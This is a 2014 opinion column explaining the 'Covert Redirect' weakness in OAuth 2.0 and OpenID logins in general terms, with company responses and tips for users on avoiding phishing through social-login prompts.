Staying Secure: Flaws in open-source software

Tuesday 06 May 2014

Jeran Camapnella looks at the implications of flaws in open-source software and gives his tips on staying secure online.

The latest flaw

Just weeks after we all suffered the heart attack from the OpenSSL vulnerability “HeartBleed”, today we see that another popular open-source security software also has a flaw.

This flaw was found in the often used log-in tools OAuth and OpenID. Many sites use this third party authorization including Google, Facebook, Microsoft, and LinkedIn, among others. A Ph.D. student at the Nanyang Technological University in Singapore, Wang Jing, discovered that the serious vulnerability "Covert Redirect" flaw can masquerade as a log-in pop up based on the affected site's domain.

A sample list of websites that are affected by the Covert Redirect vulnerability were mentioned in a video here:

Here is the gist of the vulnerability:

Let’s say a user logs in at TED Talks with Facebook, and TED Talks is compromised, it will say "Authorize TED Talks to access your account?" using the correct site's name. The user cannot tell that the third party website (in this case, TED Talks) is compromised at all.

The vulnerability is in the third party site and it is not a new one.

If a user chooses to authorize the log in, personal data (depending on what is being asked for)

will be released to the attacker instead of to the legitimate website.

Data can range from email addresses, birth dates, contact lists, and possibly even control of the account.

Overall, this has always been a known issue by many who have had to develop applications using OAuth. Before OAuth, it was a lot worse when developers had to use proprietary approaches such as Google Client Login where one would use the user credentials in their apps to request resources on behalf of the user - mishandling that data would be a lot worse.

Wang has reportedly already contacted Facebook and has reported the flaw, but was told that the company "understood the risks associated with OAuth 2.0.”

Facebook is not the only site affected. Wang states in his blog that he has reported this to Google, LinkedIn, and Microsoft, which gave him various responses on how they would handle the matter.

"Patching this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist, then there would be no room for attacks," said Wang. "However, in the real world, a large number of third-party applications do not do this due to various reasons. The lack of incentive makes the systems based on OAuth 2.0 or OpenID highly vulnerable," his blog states.

PayPal also has addressed the issue. James Barrese, PayPal’s CTO commented in a blog post Friday saying, "When PayPal implemented OAuth2.0/OpenID, we engineered additional security measures to protect our merchants and customers. These measures protect PayPal customers from this specific OAuth2.0/OpenID vulnerability."

PayPal did not add details about those measures.

For those in the internet world and for most developers, it is a known fact that OAuth 2.0 looks vulnerable to phishing and redirect attacks.

Users who trust Facebook and Google need to understand that often the security of an OAuth login

are only as good as the third party site.

Sometimes a user might feel that because they can use their Facebook to sign-in to a site,

that the site was given permission by Facebook,

and this is not the case.

How to protect yourself?

If you wish to avoid any potential loss of data, you should be careful about clicking links that immediately ask you to log in to Facebook or Google. To prevent any redirection or phishing attack you should immediately close the tab.

While this issue is not even close to the level as Heartbleed, it's easy for hackers to create these redirects and phish for your personal info so unless it gets patched, which according to Wang, is quite difficult to implement due to third-party sites having "little incentive" to fix the problem.

These security issues keep coming up, and I believe they will start to come more frequently. You can read some of my previous articles in regards to prepping for the new wave of cyber criminals starting with securing your home network and passwords.

The fact is that many of these vulnerabilities have been in place for a very long time. It was not a question of if but when they would be found. Once there is a publication about them, the malicious hackers would have the news indicating their existence, and thus do their research to exploit them before the fix could be implemented.

Some of these flaws have been in place for years prior to their discovery. I have personally never used a social connect to log-in at other sites. I have always used an independent user account, not linked to my social networks, for every website with which I interact.

To my dismay, many news organizations have now made a Facebook connection mandatory for commenting – as if trolls and spammers could not just create Facebook account after Facebook account and use them as they want.

I do not see a logical reason for a “one-size fits all login” and many other internet users feel the same. What it boils down to, yet again is a fundamental point of security that users should do their best to operate from trusted sites that have invested time and resources in the continued security of their platforms.

Many of our favorite sites have been up for years and in those years,

hackers have had the time to create the tools to get around the security that is in place.

Staying ahead of the hackers

It is simply a fact that internet-facing systems are not secure enough, and vulnerabilities will continue to be found, and hackers will take advantage of these flaws.

But if we had adequate security would we suffer from poor usability? The mindset needs to change, and we need bright people innovating new solutions that are easy to use and highly secure.

These big companies who purchase other companies for billions need to start investing bigger money into their security as much as their pretty web pages and gimmicks.

The internet and bitcoin and all they bring may well be revolutionary technology. No doubt our world today will look nothing like our world in 10 years because of it but knowing now what site you’re on and limiting the personal info you readily give away will go some way to securing your identity today. 

As Always, Be Alert, Be Accurate, Be Aware

comments powered by Disqus